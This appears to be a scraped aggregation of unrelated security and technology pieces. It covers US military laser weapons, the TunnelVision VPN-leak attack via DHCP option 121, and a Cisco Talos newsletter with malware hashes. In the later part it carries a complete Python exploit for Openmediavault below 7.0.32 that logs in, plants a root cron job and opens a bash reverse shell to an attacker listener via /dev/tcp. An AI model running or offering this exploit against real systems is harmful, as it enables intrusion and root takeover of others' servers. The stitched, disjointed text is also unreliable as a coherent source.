Amid a rising tide of adversary drones and missile attacks, laser weapons are finally poised to enter the battlefield.

The age of the laser weapon is finally upon us.

The United States Army has officially sent a pair of high-energy laser weapons overseas to defend American troops and US allies against enemy drones, the service recently revealed, marking the first publicly known deployment of a directed-energy system for air defense in military history. And, according to a top official, those weapons are actively blasting threats out of the sky.

The weapon, known as the Palletized High Energy Laser (P-HEL) and developed by the American defense contractor BlueHalo based on the company’s 20-kilowatt Locust Laser Weapon System, first arrived in an unspecified location overseas and “commenced operational employment” in November 2022, according to an April press release from the company. A second system arrived overseas “earlier this year.”

While the Army initially declined to indicate where the P-HEL systems were sent and whether they had achieved a “kill” against an adversary drone, citing operational security concerns, the service’s top acquisition official recently confirmed that the new laser weapons had in fact succeeded in neutralizing incoming threats in the Middle East.

“They've worked in some cases,” Doug Bush, the Army’s assistant secretary for acquisition, logistics, and technology, told _Forbes_ this month. “In the right conditions, they're highly effective against certain threats.”

News of the P-HEL’s deployment comes as the US military seeks to aggressively bolster its air defense capabilities amid a dramatic increase in drone and missile attacks against US troops by Iran-backed militias in the Middle East, as well as against US Navy warships operating in the Red Sea by Houthi rebels in Yemen following the October 7 attack in Israel by Hamas.

Since the beginning of the Israel-Hamas conflict, the US Defense Department has been slowly but surely hinting at the use of laser weapons downrange. But the arrival of the P-HEL in the Middle East for operational use is a technological victory for the US military, which has actively pursued research related to directed-energy weapons since the 1970s. Even more significantly, it may also represent a tipping point for the development and use of laser weapons more broadly by militaries around the world.

BlueHalo’s LOCUST Laser Weapon System (LWS) combines precision optical and laser hardware with advanced software, artificial intelligence (AI), and processing to enable and enhance the directed energy “kill chain”.Photograph: BlueHalo

**Light at the End of the Tunnel**

Following its creation in 1960 by American engineer and physicist Theodore Maiman, the laser—technically an acronym for “light amplification by stimulated emission of radiation”—almost immediately became a futuristic weapon of choice among both science fiction writers and military planners. This wasn’t surprising: While Maiman touted the potential scientific applications of his discovery when he first unveiled it to the country later that year, the laser immediately conjured up visions in the public consciousness of the Martian “heat ray” from H. G. Wells’ _War of the Worlds_, so much so that many of the contemporary headlines from its debut were variations of the _Los Angeles Herald_’s “L.A. Man Discovers Science Fiction Death Ray,” according to Jeff Hecht’s book _Beam: The Race to Make the Laser_. “In reality, the laser was more of a Life Ray than a Death Ray,” Maiman would later recall thinking of his invention’s medical applications, according to his memoir.

The Pentagon began exploring the military applications of lasers almost immediately, from relatively practical uses like designators for laser-guided bombs to more far-fetched concepts like the Strategic Defense Initiative of the 1980s, also known as “Star Wars.” But only in the past few decades has the underlying technology advanced to the point where laser weapons are effective against their intended targets.

In the mid-2000s, the Air Force successfully used its Boeing 747-based YAL-1 airborne laser to defeat ballistic missiles in flight during tests, while the Army’s Humvee-mounted Zeus-HMMWV Laser Ordnance Neutralization System system deployed to Afghanistan and Iraq to zap landmines, improvised explosive devices, and unexploded ordnance. By 2014, the Navy’s AN/SEQ-3 Laser Weapon System (LaWS) was successfully disabling drones and small boats during testing from the bow of the Austin-class amphibious transport dock USS _Ponce_ in what the service billed at the time as the world’s first “active laser weapon.” (When the _Ponce_ was decommissioned in 2017, the LaWS’s successor system, the Technology Maturation Laser Weapon System Demonstrator, was installed on the San Antonio-class amphibious transport dock USS _Portland_, which successfully tested it in 2020 and 2021).

Apart from intermittent attempts at developing a non-lethal “laser rifle” over the decades, the Pentagon has generally envisioned employing modern directed-energy weapons primarily for defensive purposes. If successfully developed, high-energy lasers in particular could prove highly effective at short-range air defense missions against helicopters and low-flying attack aircraft, as well as blasting incoming rockets, artillery, and mortars out of the sky, according to a 2023 Congressional Research Service report on the US military’s directed-energy weapons programs. With enough power, a sustained laser beam could neutralize fast-moving hardened threats like cruise missiles and, eventually, even ballistic missiles.

After decades of technological progress, the US military is finally making the dream of laser weapons an operational reality: Not only has the Pentagon increasingly poured money into research and development, spending roughly $1 billion a year on at least 31 directed-energy programs since 2020, but the department has also finally deployed several mature laser weapons alongside US forces abroad in recent years for testing.

Those laser weapons include the Air Force’s High-Energy Laser Weapon System, a Raytheon-developed dune-buggy-mounted system developed for air base defense that saw testing overseas in 2021; the Marine Corps’ Compact Laser Weapon System, which Marines have been training on in the Middle East since 2021; Lockheed Martin’s 60-kilowatt High Energy Laser with Integrated Optical-dazzler and Surveillance (HELIOS), which currently adorns the bow of the Navy’s Arleigh Burke-class destroyer USS _Preble_; and the Army’s 50-kilowatt Stryker-mounted Directed Energy Maneuver-Short Range Air Defense (DE M-SHORAD) system, or “Guardian,” which consists of a laser turret mounted on a Stryker infantry carrier, a platoon of which arrived in the Middle East in February for “real world testing.” The Army also recently took receipt of a 300-kilowatt “Valkyrie” laser system designed explicitly to deal with incoming cruise missiles.

The adoption of BlueHalo’s Locust laser weapon system in particular likely won’t stop with the P-HEL. In 2023, the company received contracts not just to develop the new 20-kilowatt Army Multi-Purpose High Energy Laser (AMP-HEL) system that’s designed to integrate with the service’s next-generation Infantry Squad Vehicle light utility vehicle, but also a potential laser system for the Marine Corps’ Joint Light Tactical Vehicle that’s set to replace the service’s aging Humvee fleet.

The US military isn’t the only conventional fighting force pushing for a directed-energy element of its air defenses. The UK Royal Navy in April announced that it planned to fast-track the installation of its new 50-kilowatt “DragonFire” high-powered laser onto a warship by 2027 instead of 2032 as originally planned “as the need for weapons to counter drone and missile threats—like those fired by Houthi rebels—grows,” the service said in a statement. Less than a week later, US House Republicans unveiled their long-delayed security assistance package for Israel that included $1.2 billion for the development of the Israeli military’s “Iron Beam” laser air defense system “to counter short-range rocket threats” amid attacks from Hamas militants. Meanwhile, countries like Russia, China, France, India, and Turkey, among others, have all invested heavily in the development of laser systems in recent years, according to the Rand Corporation.

During a trial at the MOD’s Hebrides Range, the DragonFire laser directed energy weapon (LDEW) system achieved the UK’s first high-power firing of a laser weapon against aerial targets. The range of DragonFire is classified, but it is a line-of-sight weapon and can engage with any visible target.Photograph: UK.gov

**Cheap Threats**

The development and fielding of directed-energy weapons like lasers has taken on such new urgency among world governments in recent years due to the rapid proliferation of relatively cheap one-way attack drones among both professional militaries (see: the 2020 conflict between Armenia and Azerbaijan and Russia’s ongoing invasion of Ukraine) and irregular forces like Yemen’s Houthis in the Red Sea, ISIS cells in Iraq and Syria, and Iran-backed militias across the Middle East. In 2021, then-Central Command chief Marine General Frank McKenzie Jr. warned US lawmakers that weaponized commercial off-the-shelf drones have become the greatest threat to US forces in the region since the advent of the improvised explosive device during the early years of the Global War on Terror.

That threat is very real. In January, three US service members were killed and more than 40 others were injured in a drone attack conducted by an Iran-backed militia on a military outpost in Jordan near the Syrian border. As of mid-February, more than 140 additional service members had been injured in attacks launched against American forces in Iraq and Syria since mid-October, according to the Pentagon, 130 of whom were suffering from traumatic brain injuries. That more American troops weren’t killed in these attacks was essentially a matter of luck, according to Army General Michael "Erik" Kurilla, the current head of Central Command.

"There are several incidents where \[drones\] coming into a base hit another object, got caught up in a netting or other incidents where, had they hit the appropriate target that they were targeting, it would have injured or killed service members," Kurilla told lawmakers during a Senate Armed Services Committee hearing in March.

This rising tide of adversary drones has prompted US military commanders to clamor for more directed-energy options, as has the increased threat of missile attacks. As the rate of Houthi potshots at American warships and merchant vessels in the Red Sea began to spike in January, the Navy’s current surface warfare boss publicly emphasized that the service needed to rapidly accelerate the rate of development and fielding of its directed-energy assets not just to deal with drones but also incoming cruise and ballistic missiles.

“What we’re facing in the Red Sea is more than just drones. We’re looking at land-attack cruise missiles, we’re looking at anti-ship ballistic missiles that are getting shot in the Red Sea by the Houthis. And our ships are dealing with all of those,” the Naval Surface Forces commander, vice admiral Brendan McLane, told reporters in early January. “One of the things that I think we really need to get after quicker is we need to accelerate the development of directed-energy weapons, whether it’s a laser, whether it’s a microwave.” Navy Secretary Carlos Del Toro echoed McClane’s comments the next day, telling reporters that he was “very, very excited” to boost investments in laser weapon research and development for the service.

Developing and fielding laser weapons isn’t just a matter of practicality, but price tag. Rather than force warships and ground troops to expend costly munitions like the $2.1 million-a-shot Standard Missile-2 naval missile and $480,000-a-shot FIM-92 Stinger missile on comparatively inexpensive drones, a laser weapon can defeat incoming threats with a basically negligible cost-per-shot ($1 to $10, per an April 2023 Government Accountability Office assessment) and, with a suitable power source, a near-infinite magazine. Given the fact that the US military has already expended nearly $1 billion in munitions since October to defend against Iran-backed attacks in the Red Sea and elsewhere (at an average of $100,000 per shot, per officials), lasers and other directed-energy weapons may prove far more cost-effective in the long run for a Pentagon explicitly looking to keep counter-drone costs down.

“I would love to have the Navy produce more directed energy that can shoot down a drone, so I don't have to use an expensive missile to shoot it down,” as Kurilla put it in his testimony before lawmakers in March.

The confluence of technological advancements and the urgent need posed by the rise of weaponized drones has created circumstances that may induce the US and its allies to even more rapidly develop and employ laser weapons around the world.

But challenges remain. Chief among them is ensuring that laser weapons systems actually produce a coherent laser beam as expected outside the controlled setting of a lab in the real world, where "substances in the atmosphere—particularly water vapor, but also sand, dust, salt particles, smoke, and other air pollution—absorb and scatter light, and atmospheric turbulence can defocus a laser beam," according to the Congressional Research Service. While atmospheric problems are particularly pronounced for shipboard lasers, the CRS report notes that these systems can be engineered to hit a “sweet spot” in the electromagnetic spectrum to overcome the atmospheric absorption inherent to maritime operations. Time will tell with the operational deployment of the P-HEL and testing of the DE M-SHORAD in the Middle East whether those systems can adjust to more inhospitable conditions.

Beyond functional issues, there’s also the question of teaching service members to operate a laser effectively in a combat setting. The CRS report notes that “thermal blooming”—where a sustained laser beam heats up the air it’s passing through, which in turn defocuses the beam—makes head-on (or “down-the-throat”) shots against incoming targets less effective, a problem that will require a training and doctrinal fix in order to compensate. And while many of the US military laser weapons in development require minimal training to use (the BlueHalo Locust on which the P-HEL is based runs on an Xbox controller), the 2023 GAO assessment indicated that the US military will need to develop brand new “tactics, techniques, and procedures” for operating the novel systems in complex combat environments. The laser may work, but it’s up to service members to get the most out of it.

“What we don’t know yet for directed-energy systems necessarily is how to fight \[with\] them,” said Army lieutenant general Robert Rasch, head of the service’s Rapid Capabilities and Critical Technologies Office, which manages its directed-energy portfolio, in August. “How to fight lasers on the battlefield, how to integrate kinetic and non-kinetic effectors, like directed energy, and our traditional air-defense missiles into the battle space.”

**A Problem in Search of a Solution**

Even with additional training, evolving threats like rapidly moving drones or cruise missiles hardened against interception will require a significant boost in power that most existing systems simply can’t generate yet. Take the Navy’s shipborne 60-kilowatt HELIOS laser weapon: While the service wants to scale the system to 300 kilowatts to burn through the nose cones of incoming cruise missiles, the Navy’s surface warfare boss at the time, Rear Admiral Ron Boxall, previously stated in 2019 that the fleet’s new Flight III Arleigh Burke-class destroyers are already maxed out on juice (or “out of Schlitz,” as Boxall put it) due to the requirements of operating the warships’ brand-new AN/SPY-6 Air and Missile Defense Radar. As laser weapons become more robust to counter increasingly complex threats, those power requirements are only going to increase.

And even if laser weapons actually do end up operating effectively downrange with the right technology and training, US service members are then faced with complicated logistics considerations when it comes to keeping them up and running. Laser weapons are extremely complex machines, which makes their repair and maintenance in austere environments a significant challenge for deployed service members who may not have the right tool or facilities on hand. Indeed, the GAO assessment noted that many of the internal mechanisms critical to directed-energy weapons are so sensitive that they typically require a specialized “clean room” for repairs; in one recent case, a laser weapon sent to an operational environment for testing “had to be returned to the manufacturer in the United States” for maintenance after encountering battery and cooling challenges.

“Lasers are complicated. This is not a Humvee that’s sitting in the motor pool,” as Lieutenant General Daniel Karbler, the head of the Army’s Space and Missile Defense Command, reportedly said in August 2023. “Many of the some of the main \[laser\] components … you’re not going to have a supply room or maintenance office full of repair parts.”

Taken together, all of these challenges could pose a serious potential roadblock to the widespread proliferation of laser weapons across the US military. As the GAO report notes, many promising military technologies too often fall into the so-called “valley of death”—a limbo between ongoing R&D and the actual acquisition and operational use of a new system—because the various military branches “may require a higher level of technology maturity than the science and technology community is able to fund and develop.” While military commanders may clamor for laser technology today, challenges like beam coherence and thermal blooming may prove insurmountable regardless of how much time and patience the Pentagon pours into development, a prospect that could relegate laser weapons to an R&D graveyard alongside other ambitious projects like the Navy’s electromagnetic railgun. The P-HEL may represent a new beginning for laser weapons, but it could also end up as an exception that proves they aren’t ready for prime time yet.

Maiman, the physicist who invented the laser, once famously derided his creation as “a solution in search of a problem,” an idiom often used to describe innovations that don’t address any real issue and, in turn, don’t offer any real value. But more than a half-century after the laser’s introduction into America’s modern technological vocabulary, the rise of deadly drones and missile threats has presented the laser weapon with a pressing issue worth solving. And while the laser is still far from becoming a ubiquitous piece of military technology, it holds the potential to revolutionize how US troops counter airborne threats overseas—and, in time, change the face of modern warfare as we know it.

Welcome to the Laser Wars

TunnelVision is an attack developed by researchers that can expose VPN traffic to snooping or tampering.

Researchers have devised an attack against nearly all virtual private network applications that forces them to send and receive some or all traffic outside of the encrypted tunnel designed to protect it from snooping or tampering.

TunnelVision, as the researchers have named their attack, largely negates the entire purpose and selling point of VPNs, which is to encapsulate incoming and outgoing Internet traffic in an encrypted tunnel and to cloak the user’s IP address. The researchers believe it affects all VPN applications when they’re connected to a hostile network and that there are no ways to prevent such attacks except when the user's VPN runs on Linux or Android. They also said their attack technique may have been possible since 2002 and may already have been discovered and used in the wild since then.

**Reading, Dropping, or Modifying VPN Traffic**

The effect of TunnelVision is that “the victim's traffic is now decloaked and being routed through the attacker directly,” a video demonstration explained. “The attacker can read, drop or modify the leaked traffic and the victim maintains their connection to both the VPN and the internet.”

The attack works by manipulating the DHCP server that allocates IP addresses to devices trying to connect to the local network. A setting known as option 121 allows the DHCP server to override default routing rules that send VPN traffic through a local IP address that initiates the encrypted tunnel. By using option 121 to route VPN traffic through the DHCP server, the attack diverts the data to the DHCP server itself. Researchers from Leviathan Security explained:

> Our technique is to run a DHCP server on the same network as a targeted VPN user and to also set our DHCP configuration to use itself as a gateway. When the traffic hits our gateway, we use traffic forwarding rules on the DHCP server to pass traffic through to a legitimate gateway while we snoop on it.
> 
> We use DHCP option 121 to set a route on the VPN user’s routing table. The route we set is arbitrary and we can also set multiple routes if needed. By pushing routes that are more specific than a /0 CIDR range that most VPNs use, we can make routing rules that have a higher priority than the routes for the virtual interface the VPN creates. We can set multiple /1 routes to recreate the 0.0.0.0/0 all traffic rule set by most VPNs.
> 
> Pushing a route also means that the network traffic will be sent over the same interface as the DHCP server instead of the virtual network interface. This is intended functionality that isn’t clearly stated in the RFC. Therefore, for the routes we push, it is never encrypted by the VPN’s virtual interface but instead transmitted by the network interface that is talking to the DHCP server. As an attacker, we can select which IP addresses go over the tunnel and which addresses go over the network interface talking to our DHCP server.
> 
> We now have traffic being transmitted outside the VPN’s encrypted tunnel. This technique can also be used against an already established VPN connection once the VPN user’s host needs to renew a lease from our DHCP server. We can artificially create that scenario by setting a short lease time in the DHCP lease, so the user updates their routing table more frequently. In addition, the VPN control channel is still intact because it already uses the physical interface for its communication. In our testing, the VPN always continued to report as connected, and the kill switch was never engaged to drop our VPN connection.

The attack can most effectively be carried out by a person who has administrative control over the network the target is connecting to. In that scenario, the attacker configures the DHCP server to use option 121. It’s also possible for people who can connect to the network as an unprivileged user to perform the attack by setting up their own rogue DHCP server.

The attack allows some or all traffic to be routed through the unencrypted tunnel. In either case, the VPN application will report that all data is being sent through the protected connection. Any traffic that’s diverted away from this tunnel will not be encrypted by the VPN and the internet IP address viewable by the remote user will belong to the network the VPN user is connected to, rather than one designated by the VPN app.

Interestingly, Android is the only operating system that fully immunizes VPN apps from the attack because it doesn't implement option 121. For all other OSes, there are no complete fixes. When apps run on Linux there’s a setting that minimizes the effects, but even then TunnelVision can be used to exploit a side channel that can be used to de-anonymize destination traffic and perform targeted denial-of-service attacks. Network firewalls can also be configured to deny inbound and outbound traffic to and from the physical interface. This remedy is problematic for two reasons: (1) A VPN user connecting to an untrusted network has no ability to control the firewall, and (2) it opens the same side channel present with the Linux mitigation.

The most effective fixes are to run the VPN inside of a virtual machine whose network adapter isn’t in bridged mode or to connect the VPN to the internet through the Wi-Fi network of a cellular device. The research, from Leviathan Security researchers Lizzie Moratti and Dani Cronce, is available here.

_This story originally appeared on_ _Ars Technica._

‘TunnelVision’ Attack Leaves Nearly All VPNs Vulnerable to Spying

Under a pilot program, CISA has sent out more than 2,000 alerts to registered organizations regarding the existence of any unpatched vulnerabilities in CISA’s KEV catalog.

Thursday, May 9, 2024 14:00

One of the great cybersecurity challenges organizations currently face, especially smaller ones, is that they don’t know what they don’t know. 

It’s tough to have your eyes on everything all the time, especially with so many pieces of software running and IoT devices extending the reach of networks broader than ever.  

One potential (and free!) solution seems to be a new program from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) that alerts companies and organizations of unpatched vulnerabilities that attackers could exploit.  

Under a pilot program that’s been running since January 2023, CISA has sent out more than 2,000 alerts to registered organizations regarding the existence of any unpatched vulnerabilities in CISA’s Known Exploited Vulnerabilities (KEV) catalog. For those that don’t know, the KEV catalog consists of any security issues that threat actors are known to actively exploit in the wild, and often include some of the most serious vulnerabilities disclosed on a regular basis, some of which have been around for years. 

Jen Easterly, CISA’s director, said last month that 49 percent of those vulnerabilities that CISA sent alerts about were mitigated — either through patching or other means. The program will launch in earnest later this year, but more than 7,000 organizations have already registered for the pilot program. 

Everything about this makes sense to me — it comes at no cost to the consumer or business, it allows the government to inform organizations of something they very likely aren’t aware of, and these issues are easy enough to fix with software or hardware patches.  

I’m mainly wondering how we’ll get more potential targets to sign up for this program and receive these alerts. 

According to CISA’s web page on the program, the alerts are only currently available to “Federal, state, local, tribal and territorial governments, as well as public and private sector critical infrastructure organizations.” 

I would imagine that, at some point, the scope of this will be expanded if it continues to be successful, and there are no clear guidelines for what “critical infrastructure” means in this context, exactly. (For example, would something like a regional ISP would be eligible for this program? I’d consider this CI, but I’m not sure the federal government would.) 

Currently, signing up for the alerts seems to be as simple as sending an email. CISA’s also been sending alerts to any vulnerable systems that appear on Shodan scans. I don’t think there’s a way to make something like this compulsory unless it’s codified into law somewhere, but it almost seems like it should be. 

Who wouldn’t want to just get free alerts from the federal government telling you when your network has a vulnerability that’s being exploited in the wild? For many of the local and state government teams, the pilot program targets are understaffed and underfunded, and sometimes the act of patching can get so overwhelming that it can take months to keep current. But this type of organization may also be stretched thin to the point they haven’t even heard of this program from CISA. So if the most I can do is shout out this government program in this newsletter and one extra company signs up, I’ll feel good about that.  

**The one big thing **

Cisco Talos’ Vulnerability Research team recently disclosed three zero-day vulnerabilities two of which are still unpatched as of Wednesday, May 8. Two vulnerabilities in this group — one in the Tinyroxy HTTP proxy daemon and another in the stb\_vorbis.c file library — could lead to arbitrary code execution, earning both issues a CVSS score of 9.8 out of 10. While we were unable to reach the maintainers, the Tinyproxy maintainers have since patched the issue. Another zero-day exists in the Milesight UR32L wireless router. These vulnerabilities have all been disclosed in adherence to Cisco’s third-party vulnerability disclosure timeline after the associated vendors did not meet the 90-day deadline for a patch or communication.   

**Why do I care? **

Tinyproxy is meant to be used in smaller networking environments. It was originally released more than a dozen years ago. A use-after-free vulnerability, TALOS-2023-1889 (CVE-2023-49606), exists in the \`Connection\` header provided by the client. An adversary could make an unauthenticated HTTP request to trigger this vulnerability, setting off the reuse of previously freed memory, which leads to memory corruption and could lead to remote code execution. Four of these issues that Talos disclosed this week still do not have patches available, so anyone using affected software should find other potential mitigations. 

**So now what? **

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Top security headlines of the week **

**Several international law enforcement agencies have identified, sanctioned and indicted the alleged leader of the LockBit ransomware group.** Russian national Dmitry Yuryevich Khoroshev has been unmasked as the person behind the operator of the username “LockBitSupp,” LockBit’s creator and mastermind. The ransomware group has extorted an estimated $500 million from its victims over its several years of activity. Khoroshev allegedly took 20 percent of each ransom payment and operated the group’s data leak site. The U.S. federal government is offering up to a $10 million reward for anyone who can provide information leading to Khoroshev’s arrest. In all, he is charged with 26 crimes in the U.S. that carry a maximum punishment of 185 years in prison. LockBit, founded around 2018, operates under the ransomware-as-service model in which other actors can pay to access LockBit’s malware and infection tools. The group has been linked to several major ransomware attacks over the years, including against the U.K.’s Royal Mail service, a small Canadian town in Ontario and a children’s hospital in Chicago. (Wired, The Verge) 

**The U.K. blamed Chinese state-sponsored actors for a recent data breach at a military contractor that led to the theft of personal information belonging to around 270,000 members of the British armed forces.** Potentially affected information includes names and banking information for full-time military personnel and part-time reservists, as well as veterans who left the military after January 2018. Some of those affected are also current members of parliament. A top official at the U.K.’s Ministry of Defense called the breach a “very significant matter” and that the contractor immediately took the affected systems offline. While the British government has yet to formally attribute the attack to a specific threat actor, several reports indicate they believe an actor emanating from China was responsible. While the actors may have been present on the network for up to weeks, there is currently no evidence that the information was copied or removed. (The Guardian, Financial Times) 

**Security researchers found a new attack vector that could allow bad actors to completely negate the effect of VPNs.** The method, called “TunnelVision,” can force VPN services to send or receive some or all traffic outside of the encrypted tunnel they create. Traditionally users will rely on VPNs to protect their traffic from snooping or tampering, or to hide their physical locations. The researchers believe TunnelVision affects every VPN application available if it connects to an attacker-controlled network. There is currently no way to avoid or bypass these attacks unless the VPN runs on Linux or Android. TunnelVision has been possible since at least 2002, though it's unclear how often it's been used in the wild. VPN users who are concerned about this attack can run their VPN inside a virtual machine whose network adapter isn’t in bridged mode or connect via the Wi-Fi network of a cellular device. However, for the attack to be effective, the attacker would need complete control over a network. If a connection is affected, though, the user would be completely unaware, and the VPN would not alert them to a change. (Ars Technica, ZDNet) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #182: 4 takeaways from what Talos IR is seeing in the field 
*   ClamAV 1.4.0 release candidate now available! 
*   Critical Tinyproxy Flaw Opens Over 50,000 Hosts to Remote Code Execution 
*   Vulnerabilities in employee management system could lead to remote code execution, login credential theft 

**Upcoming events where you can find Talos **

**ISC2 SECURE Europe** **(May 29)** 

_Amsterdam, Netherlands_ 

> _Gergana Karadzhova-Dangela from Cisco Talos Incident Response will participate in a panel on “Using ECSF to Reduce the Cybersecurity Workforce and Skills Gap in the EU.” Karadzhova-Dangela participated in the creation of the EU cybersecurity framework, and will discuss how Cisco has used it for several of its internal initiatives as a way to recruit and hire new talent._  

**Cisco Live** **(June 2 - 6)** 

_Las Vegas, Nevada_  

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0    
**MD5:** 8c69830a50fb85d8a794fa46643493b2    
**Typical Filename:** AAct.exe    
**Claimed Product:** N/A     
**Detection Name:** W32.File.MalParent 

**SHA 256:** d529b406724e4db3defbaf15fcd216e66b9c999831e0b1f0c82899f7f8ef6ee1   
**MD5:** fb9e0617489f517dc47452e204572b4e   
**Typical Filename:** KMSAuto++.exe   
**Claimed Product:** KMSAuto++   
**Detection Name:** W32.File.MalParent 

**SHA 256:** abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6   
**MD5:** 22ae85259273bc4ea419584293eda886   
**Typical Filename:** KMSAuto++ x64.exe   
**Claimed Product:** KMSAuto++   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7    
**MD5:** 0e4c49327e3be816022a233f844a5731    
**Typical Filename:** aact.exe    
**Claimed Product:** AAct x86    
**Detection Name:** PUA.Win.Tool.Kmsauto::in03.talos 

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa     
**MD5:** df11b3105df8d7c70e7b501e210e3cc3     
**Typical Filename:** DOC001.exe     
**Claimed Product:** N/A     
**Detection Name:** Win.Worm.Coinminer::1201

A new alert system from CISA seems to be effective — now we just need companies to sign up

Openmediavault versions prior to 7.0.32 have a vulnerability that occurs when users in the web-admin group enter commands on the crontab by selecting the root shell. As a result of exploiting the vulnerability, authenticated web-admin users can run commands with root privileges and receive reverse shell connections.

    # Exploit Title: Openmediavault < 7.0.32 Authenticated RCE & Local Privilege Escalation# Date: 08.05.2024# Exploit Author: Mert BENADAM# Vendor Homepage: https://www.openmediavault.org/# Software Link: https://sourceforge.net/projects/openmediavault/# Version: < 7.0.32# Tested on: OMV 7.0.32 & 6.5 @Virtual Machine# Description: OpenMediaVault is the next generation network attached storage (NAS) solution based on Debian Linux.# Special Thx: k3yZ :)"""PoC:This vulnerability occurs when users in the web-admin group enter commands on the crontab by selecting the root shell.As a result of exploiting the vulnerability,authenticated web-admin users can run commands with root privileges and receive reverse shell connections.It can also be used in privilege escalation attacks on local systems."""import argparseimport requestsimport jsondef login(ip_address, username, password, lhost, lport):    try:        login_data = {            "service": "Session",            "method": "login",            "params": {                "username": username,                "password": password            },            "options": None        }        url = f"http://{ip_address}/rpc.php"        response = requests.post(url, json=login_data)        if response.status_code == 200:            print("Login Success , Checking User Privilages...")            post_check(ip_address, response.cookies, lhost , lport)        else:            print("login Failed, Probably Wrong User Credentials...")            print("Reason:")            print(response.json())    except requests.exceptions.ConnectionError:        print("Connection Error: Could Not Connect To The Server...")    except Exception as e:        print("Unexpected Error:", e)def post_check(ip_address, cookies, lhost, lport):    try:        post_data = {            "service": "Cron",            "method": "getList",            "params": {                "type": ["userdefined"],                "start": 0,                "limit": -1            },            "options": None        }        url = f"http://{ip_address}/rpc.php"        response = requests.post(url, json=post_data, cookies=cookies)        if response.status_code == 200:            print("Accesing Crons...OK")            send_post(ip_address, cookies, lhost , lport)        elif response.status_code == 403:            print("Kullanıcı yetkili değil.")        else:            print("Post Request Failure...")    except requests.exceptions.ConnectionError:        print("Connection Error: Could Not Connect To The Server...")    except Exception as e:        print("Beklenmeyen bir hata oluştu:", e)def send_post(ip_address, cookies, lhost , lport):    try:        post_data = {            "service": "Cron",            "method": "set",            "params": {                "uuid": "fa4b1c66-ef79-11e5-87a0-0002b3a176b4",  # UUID                "enable": True,                "execution": "exactly",                "minute": ["*"],                "everynminute": False,                "hour": ["*"],                "everynhour": False,                "dayofmonth": ["*"],                "everyndayofmonth": False,                "month": ["*"],                "dayofweek": ["*"],                "username": "root",                "command": f"bash -c 'exec bash -i &>/dev/tcp/{lhost}/{lport} <&1'",  # Command From User                "sendemail": False,                "comment": "",                "type": "userdefined"            },            "options": None        }        url = f"http://{ip_address}/rpc.php"        response = requests.post(url, json=post_data, cookies=cookies)        if response.status_code == 200:            print("Payload Sent... OK,")            update(ip_address, cookies)        elif response.status_code == 403:            print("User Not Authrorized.")        else:            print("Something Wrong.CHECK your version...")    except requests.exceptions.ConnectionError:        print("Connection Error: Could Not Connect To The Server...")    except Exception as e:        print("Unexpected Error:", e)def update(ip_address, cookies):    try:        post_data = {            "service": "Config",            "method": "applyChangesBg",            "params": {                "modules": [],                "force": False            },            "options": None        }        url = f"http://{ip_address}/rpc.php"        response = requests.post(url, json=post_data, cookies=cookies)        if response.status_code == 200:            print("Updating crontabs...")            print("Successfully Exploited...")            print("Exploited Shell Will Be Triggered In 1 Minute, Check Your Listener...")            print("Warning: Make sure You Open a listener And Enter Correct IP-PORT Information...")        elif response.status_code == 403:            print("User Not Authrorized.")        else:            print("Someting Wrong. Check version...")    except requests.exceptions.ConnectionError:        print("Connection Error: Could Not Connect To The Server...")    except Exception as e:        print("Unexpected Error:", e)def main():    font="""███╗   ██╗ ██████╗ ███╗   ███╗███████╗██████╗  ██████╗██╗   ██╗ ██████╗  ██████╗████╗  ██║██╔═══██╗████╗ ████║██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔═████╗██╔═████╗██╔██╗ ██║██║   ██║██╔████╔██║█████╗  ██████╔╝██║      ╚████╔╝ ██║██╔██║██║██╔██║██║╚██╗██║██║   ██║██║╚██╔╝██║██╔══╝  ██╔══██╗██║       ╚██╔╝  ████╔╝██║████╔╝██║██║ ╚████║╚██████╔╝██║ ╚═╝ ██║███████╗██║  ██║╚██████╗   ██║   ╚██████╔╝╚██████╔╝╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝    ╚═════╝  ╚═════╝    """    parser = argparse.ArgumentParser(description="OpenMediaVault 7.0.32 > 6.5.0 RCE And Local Privilage Escalation")    parser.add_argument("-U", "--ip", type=str, help="Victim Ip Adress", required=False)    parser.add_argument("-u", "--username", type=str, help="Username For Web Admin", required=False)    parser.add_argument("-p", "--password", type=str, help="Password For Web Admin", required=False)    parser.add_argument("-L", "--lhost", type=str, help="Listener IP Adress For Reverse Shell", required=False)    parser.add_argument("-P", "--lport", type=str, help="Listener Port For Reverse Shell", required=False)    args = parser.parse_args()    if args.ip and args.username and args.password and args.lhost and args.lport:        print(font)        login(args.ip, args.username, args.password, args.lhost , args.lport)    else:        print(font)        parser.print_help()if __name__ == "__main__":    main()

Openmediavault Remote Code Execution / Local Privilege Escalation

RIOT versions 2024.01 and below suffers from multiple buffer overflows, ineffective size checks, and out-of-bounds memory access vulnerabilities.

RIOT 2024.01 Buffer Overflows / Lack Of Size Checks / Out-Of-Bound Access

Clinic Queuing System version 1.0 suffers from a remote code execution vulnerability.

